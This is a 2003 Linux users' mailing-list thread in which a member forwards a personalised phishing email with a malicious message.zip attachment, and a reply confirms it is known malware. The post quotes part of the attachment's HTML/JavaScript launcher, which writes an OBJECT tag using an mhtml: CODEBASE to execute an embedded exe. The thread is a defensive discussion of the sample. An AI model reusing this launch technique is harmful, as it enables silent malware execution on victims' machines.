[ale] Interesting trojan attempt?

Kevin Karst kevinkarst at yahoo.com
Sun Aug 3 17:54:11 EDT 2003



this message.zip is popular currently ..
it is harmful software and there is information on the
net about it.


--- "David S. Jackson" <dsj at sylvester.dsj.net> wrote:
> This forwarded message came to me from my pop
> account at
> Earthlink.  It has the Subject line:
> 
> Subject: [admin at sylvester.dsj.net: your account     
>                    vjovvlov]
> 
> It looked kinda clever.  I don't think I've seen
> this before.
> Somehow it snarfed my MX machine's name and stuck it
> into the
> subject line and into the To:, Reply-To:, and From:
> address.  I
> Almost thought it was real for a second.  I
> shouldn't be allowing
> external queries from my internal DNS server anyway,
> so I'd
> better make sure that didn't happen.
> 
> The attachment was a zip file labelled: 
> message.zip.
> 
> When I pipe the "message" to less through unzip -p,
> I get
> compiled binary output followed by some "launch
> code" in an html
> file:
> 
> <SCRIPT>
> function malware()
> {
>
s=document.URL;path=s.substr(-0,s.lastIndexOf("\\"));
> path=unescape(path);
> document.write(' <title>Message</title><body
> scroll=no
> bgcolor=white><FONT face=
> "Arial" color=black
> style="position:absolute;top:20;left:90;z-index:100;
> font-si
> ze:12px;">No message</center><OBJECT
> style="cursor:cross-hair"
> alt="moo ha ha" C
> LASSID="CLSID:11111111-1111-1111-1111-111111111111"
> CODEBASE="mhtml:'+path+'\\m
> essage.html!File://foo.exe"></OBJECT>')
> }
> 
> [ lots more html snipped... ]
> 
> Anyway, I guess you guys see this quite a bit, but I
> hadn't seen
> anything quite so personalized before.  (Also, the
> X-Mailer:
> attribution was kind of obvious.  And the timestamp
> was in PDT.)
> 
> 
> ----- Forwarded message from admin at sylvester.dsj.net
> -----
> 
> Received: from localhost (dsj at localhost [127.0.0.1])
> 	by sylvester.dsj.net (8.12.3/8.12.3/Debian-5) with
> ESMTP id h7385pXI009561
> 	for <dsj at localhost>; Sun, 3 Aug 2003 04:38:42 -0400
> Received: from pop.dsj.net [207.217.120.137]
> 	by localhost with POP3 (fetchmail-5.9.11)
> 	for dsj at localhost (single-drop); Sun, 03 Aug 2003
> 04:38:42 -0400 (EDT)
> Received: from localhost ([211.110.44.18])
> 	by tern (EarthLink Mail Service) with SMTP id
> 19Jdzq2Bj3NZFmh0
> 	for <dsj at dsj.net>; Sun, 3 Aug 2003 00:46:18 -0700
> (PDT)
> From: admin at sylvester.dsj.net
> To: Dsj <dsj at dsj.net>
> Reply-To: admin at sylvester.dsj.net
> X-Mailer: The Bat! (v1.61)
> X-Priority: 2 (High)
> Subject: your account                        
> vjovvlov
> MIME-Version: 1.0
> Content-Type: multipart/mixed;
> boundary="----------5B228CBD052294B"
> Message-Id: <200308030046.19Jdzq2Bj3NZFmh0 at tern>
> Date: Sun, 3 Aug 2003 00:46:18 -0700 (PDT)
> Status: RO
> Content-Length: 29765
> Lines: 402
> 
> 
> Hello there,
> 
> I would like to inform you about important
> information regarding your
> email address. This email address will be expiring.
> Please read attachment for details.
> 
> ---
> Best regards, Administrator
> vjovvlov
> 
> 
> 
> ----- End forwarded message -----
> 
> 
> -- 
> David S. Jackson                        dsj at dsj.net
> =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
> Thank goodness modern convenience is a thing of the
> remote future.
> 		-- Pogo, by Walt Kelly
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale


__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
_______________________________________________
Ale mailing list
Ale at ale.org
http://www.ale.org/mailman/listinfo/ale





More information about the Ale mailing list